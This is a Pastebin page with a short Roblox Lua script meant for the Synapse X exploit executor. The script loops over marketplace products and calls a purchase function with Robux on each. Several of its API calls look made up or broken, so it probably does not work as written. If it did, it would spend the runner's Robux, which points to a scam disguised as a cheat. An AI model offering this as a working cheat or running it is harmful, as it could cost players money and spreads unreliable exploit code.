Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- -- Only works in Synapse X.
- -- If you think I added the Synapse Funtion because this script is only supported by Synapse X.
- -- If you delete the Synapse Function it will not work even though you executed it on Synapse X.
- -- The Synapse Function is to add variables that is not supported on other executors.
- if syn and syn.is_synapse_function() then
- for _, gamepass in ipairs(game:GetService("MarketplaceService"):GetProductCollection(game:GetService("MarketplaceService"):GetRobuxSpent())).Items do
- game:GetService("MarketplaceService"):PerformPurchase(gamepass["ProductId"], Enum.CurrencyType.Robux)
- end
- end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement